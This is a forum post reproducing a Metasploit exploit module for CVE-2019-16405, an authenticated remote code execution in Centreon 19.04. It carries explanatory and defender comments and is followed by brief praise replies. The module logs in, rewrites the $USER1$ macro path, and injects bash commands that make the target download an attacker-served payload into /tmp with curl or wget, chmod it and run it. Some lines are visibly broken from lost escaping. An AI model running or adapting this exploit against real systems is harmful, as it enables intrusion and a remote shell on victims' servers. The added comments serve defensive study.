Centreon 19.04 - Authenticated Remote Code Execution

发表于 2021-2-8 15:39:05 | 显示全部楼层 |阅读模式
Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)
  1. ####################################################################
  2. # This module requires Metasploit: https://metasploit.com/download #
  3. #  Current source: https://github.com/rapid7/metasploit-framework  #
  4. ####################################################################

  # Metasploit exploit module for CVE-2019-16405 (Centreon =< 18.10 and 19.04,
  # per the Description below). It is post-authentication: the login step
  # captures a session cookie into @phpsessid and every later request carries it.
  #
  # Request flow as visible in the methods below (each step is a send_request_cgi):
  #   1. exploit        - GET index.php for a centreon_token, POST the credentials,
  #                       POST main.get.php?p=60904 to set the $USER1$ resource
  #                       macro's resource_line to "/", then hand off to `super`
  #                       (the in-module HTTP server) under an HTTPDELAY timeout.
  #   2. primer         - builds the URL the target will fetch the payload from.
  #   3. send_payload   - POST main.get.php?p=60801 with a command_line that
  #                       downloads the payload into /tmp on the target.
  #   4. on_request_uri - serves the payload bytes, then run_shell chmods and runs it.
  #
  # Defender notes (derived only from the requests this module sends):
  #   - Detection: access logs with POST main.get.php p=60904 changing the $USER1$
  #     resource_line to "/", and POST main.get.php p=60801 whose command_line
  #     begins with "/bin/bash -c" and references curl/wget or a /tmp path;
  #     process telemetry showing the web-server user spawning bash, curl or
  #     wget and then executing a file from /tmp.
  #   - Mitigation: the Description records a vendor fix (10/16/2019; see the
  #     centreon pull request in References) - upgrade, and treat the admin
  #     credentials this module requires (USERNAME/PASSWORD) as the control
  #     boundary, with credential hygiene and login auditing on the Centreon UI.
  class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient        # send_request_cgi / normalize_uri / target_uri
  include Msf::Exploit::Remote::HttpServer::HTML  # in-module HTTP server that hands out the payload
  include Msf::Exploit::EXE                       # generate_payload_exe

  # Module metadata and datastore options.
  #
  # Note: the Description says public disclosure was 10/18/2019 while
  # DisclosureDate is "Oct 19 2019" - one of the two is presumably off by a day.
  #
  # @param info [Hash] base module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
        "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
        "Description" =>  %q{
          Authenticated Remote Code Execution on Centreon Web Appliances.
          Affected versions: =< 18.10, 19.04
          By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
          Vendor verified: 09/17/2019
          Vendor patched: 10/16/2019
          Public disclosure: 10/18/2019
        },
        "License" => MSF_LICENSE,
        'Author' => [
          'TheCyberGeek', # Discovery
          'enjloezz' # Discovery and Metasploit Module
        ],
        'References' =>
        [
            ['URL','https://github.com/centreon/centreon/pull/7864'],
            ['CVE','2019-16405']
        ],
        "Platform" => "linux",
        "Targets" => [
          ["Centreon", {}],
        ],
        # Declared aggressive: the module itself opens a listening HTTP server
        # (SRVPORT, default 80 below) rather than only sending requests.
        "Stance" => Msf::Exploit::Stance::Aggressive,
        "Privileged" => false,
        "DisclosureDate" => "Oct 19 2019",
        "DefaultOptions" => {
          "SRVPORT" => 80,
        },
        "DefaultTarget" => 0
      ))

    register_options(
      [
        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
        # NOTE(review): registered as "TARGETS" here, but send_payload reads
        # datastore["method"]; the two names do not line up as written.
        OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
      ]
    )
  end

  # Entry point. Logs in, rewrites the $USER1$ resource macro, then runs the
  # mixin's server (`super`) so the target can fetch the payload.
  #
  # Side effects: sets @phpsessid (session cookie) used by every later request.
  # Connection failures are reported via vprint_error and swallowed; a missing
  # CSRF token returns early.
  def exploit
    begin
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "index.php"),
        "method" => "GET",
      )
      @phpsessid = res.get_cookies
      # A named-capture regex on the LEFT of =~ assigns the local `token`
      # (nil when the login page carries no centreon_token input).
      /centreon_token".*value="(?<token>.*?)"/ =~ res.body

      unless token
        vprint_error("Couldn't get token, check your TARGETURI")
        return
      end
      # Credential POST; send_request_cgi! follows redirects. Detection hook:
      # this is an ordinary admin login, so failed/unusual-source logins for
      # the admin alias are the earliest signal a defender sees.
      res = send_request_cgi!(
      "uri" => normalize_uri(target_uri.path, "index.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_post" => {
        "useralias" => datastore["USERNAME"],
        "password" => datastore["PASSWORD"],
        "centreon_token" => token,
        },
      )
      # Login success is inferred from the SPA shell text in the response body.
      # NOTE(review): res is not nil-checked before res.body here, and the
      # fail_with line lacks a comma between the failure class and the message,
      # so as written it does not call fail_with with the intended arguments.
      unless res.body.include? "You need to enable JavaScript to run this app"
        fail_with Failure::NoAccess "Cannot login to Centreon"
      end
      print_good("Login Successful!")
      # Fetch the resource-macro edit form (p=60904, o=c, resource_id=1) to
      # obtain a fresh centreon_token for the save request that follows.
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "method" => "GET",
        "cookie" => @phpsessid,
        "vars_get" => {
          "p" => "60904",
          "o" => "c",
          "resource_id" => 1,
        },
      )
      /centreon_token".*value="(?<token>.*?)"/ =~ res.body
      # Save $USER1$ with resource_line "/" - the configuration change the
      # Description calls "amending the Macros Expression's default directory".
      # Defender hook: audit/alert on modifications to the $USER1$ resource,
      # whose comment field here reads "Nagios Plugins Path".
      res = send_request_cgi(
        "uri" => normalize_uri(target_uri.path, "main.get.php"),
        "vars_get" => {
          "p" => "60904",
          },
        "method" => "POST",
        "cookie" => @phpsessid,
        "vars_post" => {
          "resource_name": "$USER1$",
          "resource_line": "/",
          "instance_id": 1,
          "resource_activate": 1,
          "resource_comment": "Nagios Plugins Path",
          "submitC": "Save",
          "resource_id": 1,
          "o": "c",
          # Adjacent literals concatenate, so the value sent is "a:0:{}" - a
          # serialized empty PHP array. The extra "" pairs may be escaping lost
          # in the page extraction; confirm against the upstream module.
          "initialValues": "" "a:0:{}" "",
          "centreon_token": token
        },
      )
      # `super` presumably runs the HttpServer mixin's exploit (start the
      # server, call primer, wait for on_request_uri) - confirm. The timeout
      # bounds how long that server stays up if the target never calls back.
      begin
        Timeout.timeout(datastore["HTTPDELAY"]) { super }
      rescue Timeout::Error
        vprint_error("Server Timed Out...")
      end
    rescue ::Rex::ConnectionError
      vprint_error("Connection error...")
    end
  end

  # Server-side setup: generates the payload executable into @pl, records the
  # single served resource path in @path and builds the callback URL.
  # `service.resources.keys[0]` is assumed to be the mixin's registered URI
  # for this module - confirm.
  def primer
    @pl = generate_payload_exe
    @path = service.resources.keys[0]
    binding_ip = srvhost_addr

    proto = ssl ? "https" : "http"
    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
    send_payload(payload_uri)
  end

  # Submits a command_line to the command test handler (p=60801, o=p) that
  # fetches payload_uri into /tmp with curl or wget.
  #
  # NOTE(review): the quoting on the `payload =` line is not valid Ruby as
  # shown - escape characters appear to have been lost in the page extraction.
  # It also reads datastore["method"], whereas the option registered in
  # initialize is "TARGETS".
  #
  # @param payload_uri [String] URL of this module's HTTP server resource
  def send_payload(payload_uri)
    payload = "/bin/bash -c "" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}""
    print_good("Sending Payload")
    send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
    )
  end

  # HTTP server callback (HttpServer mixin) for the target's fetch of the
  # payload: serves @pl, then triggers run_shell and shuts the server down.
  #
  # @param cli [Object] client connection handed over by the mixin
  # @param req [Object] request; only req.uri is read (for the log line)
  def on_request_uri(cli, req)
    print_good("#{peer} - Payload request received: #{req.uri}")
    send_response(cli, @pl)
    run_shell
    stop_service
  end

  # Two more command-test submissions (p=60801, o=p): chmod 777 on the
  # downloaded file, then execute it. Both `res` assignments are unused, so
  # neither response is checked. The chmod line has the same lost-escaping
  # quoting issue as send_payload.
  def run_shell
    print_good("Setting permissions for the payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/bin/bash -c "chmod 777 /tmp/#{@path}"",
        "o": "p",
        "min": 1,
      },
    )

    print_good("Executing Payload")
    res = send_request_cgi(
      "uri" => normalize_uri(target_uri.path, "main.get.php"),
      "method" => "POST",
      "cookie" => @phpsessid,
      "vars_get" => {
        "p": "60801",
        "command_hostaddress": "",
        "command_example": "",
        "command_line": "/tmp/#{@path}",
        "o": "p",
        "min": 1,
      },
    )
  end
  end


发表于 2021-2-8 15:39:15 | 显示全部楼层
非常好!!
发表于 2021-2-8 15:39:25 | 显示全部楼层
转发了!!
发表于 2021-2-8 15:39:32 | 显示全部楼层
顶一下!!
发表于 2021-2-8 15:39:41 | 显示全部楼层
不错!!
发表于 2021-2-8 15:39:55 | 显示全部楼层
太棒了!!